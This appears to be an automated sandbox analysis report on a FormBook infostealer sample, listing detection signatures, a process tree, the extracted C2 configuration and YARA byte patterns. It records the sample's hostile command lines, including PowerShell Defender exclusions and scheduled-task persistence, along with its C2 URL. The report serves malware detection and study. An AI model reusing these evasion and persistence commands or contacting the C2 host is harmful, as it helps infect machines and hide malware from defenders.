Edit tour

Windows Analysis Report
po8909893299832.exe

Overview

General Information

Sample name:	po8909893299832.exe
Analysis ID:	1449475
MD5:	8c2635e6c2804ace5c6fa487f5e23a87
SHA1:	334e05486efda6725b100a9365d5017aefb90e22
SHA256:	d6c03cce5773652c4cb266084f901b331550d57a656240d20c288484657cd701
Tags:	exeRFQ
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Query firmware table information (likely to detect VMs)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

po8909893299832.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\po8909893299832.exe" MD5: 8C2635E6C2804ACE5C6FA487F5E23A87)

powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\po8909893299832.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8132 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7852 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp6E21.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

po8909893299832.exe (PID: 8056 cmdline: "C:\Users\user\Desktop\po8909893299832.exe" MD5: 8C2635E6C2804ACE5C6FA487F5E23A87)

explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

msdt.exe (PID: 6360 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)

cscript.exe (PID: 5188 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: CB601B41D4C8074BE8A84AED564A94DC)

cmd.exe (PID: 432 cmdline: /c del "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7904 cmdline: C:\Windows\system32\WerFault.exe -u -p 4084 -s 3040 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

InXlDTKncKkCk.exe (PID: 8096 cmdline: C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe MD5: 8C2635E6C2804ACE5C6FA487F5E23A87)

schtasks.exe (PID: 5972 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\InXlDTKncKkCk" /XML "C:\Users\user\AppData\Local\Temp\tmp7E6D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InXlDTKncKkCk.exe (PID: 5384 cmdline: "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe" MD5: 8C2635E6C2804ACE5C6FA487F5E23A87)

InXlDTKncKkCk.exe (PID: 7492 cmdline: "C:\Users\user\AppData\Roaming\InXlDTKncKkCk.exe" MD5: 8C2635E6C2804ACE5C6FA487F5E23A87)

explorer.exe (PID: 8072 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vagabondtracks.com/hd05/"], "decoy": ["businessjp6-51399.info", "countyyoungpest.com", "taxilasamericas.com", "stairs.parts", "nrgsolutions.us", "cbdgirl.guru", "dropshunter.net", "adorabubble.co.za", "alcohomeexteriors.com", "aquariusbusiness.info", "zaginione.com", "pintoresmajadahonda.com", "fursace.club", "musiletras.co", "carpoboutiquehotel.com", "redacted.investments", "symplywell.me", "lezxop.xyz", "stmbbill.com", "1509068.cc", "savdesign.online", "gaiacoreresearch.com", "pivoluvva-usa.com", "kathrynmirabella.com", "ziplnk.xyz", "furanoikedanouen.com", "regenesisvista.world", "lorenzodavissr.com", "friendlyemporium.com", "7727.info", "moledistillery.com", "geturpdtaemza.com", "sparkfirestarter.net", "q3hjns.shop", "thingsidonaked.com", "attack.info", "salihkaradag.com", "vn6b6q.com", "thierrydoublein.com", "buddhasiddhartha.com", "uniqueofferss.com", "trexendofparadise.club", "evans-gdaddy-test-domain.online", "kgroundx.com", "2us7o.us", "damtherncooling.com", "kakashi-hatake.shop", "blogonrunning.com", "lovepox.com", "ramediatech.online", "satwaspin.net", "greenink.store", "tuskerlogix.com", "codyscalls.com", "system.ngo", "connect-talent.com", "addck.top", "teramilab.com", "yuyuklmn123888yy.xyz", "9orwr6.vip", "nubeqa77.life", "lmpalmour.com", "sandeshkrantinews.in", "find-buildings.com"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x66f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x34b11:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b480:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3928f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44177:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9da8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa022:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x381c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38442:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x43f75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43a61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44077:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x441ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x38e5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x148bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x42cdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb733:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x39b53:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bdc7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4a1e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cdca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1490594410.0000000003EE9000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18ce9:$sqlite3step: 68 34 1C 7B E1 0x18dfc:$sqlite3step: 68 34 1C 7B E1 0x47109:$sqlite3step: 68 34 1C 7B E1 0x4721c:$sqlite3step: 68 34 1C 7B E1 0x18d18:$sqlite3text: 68 38 2A 90 C5 0x18e3d:$sqlite3text: 68 38 2A 90 C5 0x47138:$sqlite3text: 68 38 2A 90 C5 0x4725d:$sqlite3text: 68 38 2A 90 C5 0x18d2b:$sqlite3blob: 68 53 D8 7F 8C 0x18e53:$sqlite3blob: 68 53 D8 7F 8C 0x4714b:$sqlite3blob: 68 53 D8 7F 8C 0x47273:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6cc1:$a1: 3C 30 50 4F 53 54 74 09 40 0x350e1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d630:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4ba50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb43f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3985f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16327:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44747:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa378:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa5f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38798:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38a12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16125:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15c11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x44031:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16227:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1639f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x447bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb00a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3942a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14e8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x432ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbd03:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3a123:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c397:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x4a7b7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d39a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1449357318.0000000003809000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x192b9:$sqlite3step: 68 34 1C 7B E1 0x193cc:$sqlite3step: 68 34 1C 7B E1 0x476d9:$sqlite3step: 68 34 1C 7B E1 0x477ec:$sqlite3step: 68 34 1C 7B E1 0x192e8:$sqlite3text: 68 38 2A 90 C5 0x1940d:$sqlite3text: 68 38 2A 90 C5 0x47708:$sqlite3text: 68 38 2A 90 C5 0x4782d:$sqlite3text: 68 38 2A 90 C5 0x192fb:$sqlite3blob: 68 53 D8 7F 8C 0x19423:$sqlite3blob: 68 53 D8 7F 8C 0x4771b:$sqlite3blob: 68 53 D8 7F 8C 0x47843:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6051:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c9c0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa7cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x156b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9708:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x154b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14fa1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x155b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1572f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa39a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1421c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb093:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b727:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c72a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1449357318.0000000004101000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18649:$sqlite3step: 68 34 1C 7B E1 0x1875c:$sqlite3step: 68 34 1C 7B E1 0x18678:$sqlite3text: 68 38 2A 90 C5 0x1879d:$sqlite3text: 68 38 2A 90 C5 0x1868b:$sqlite3blob: 68 53 D8 7F 8C 0x187b3:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.3855823096.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.3856542244.0000000003000000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.1502381208.00000000026D0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000012.00000002.3854578861.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000010.00000002.1495831223.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
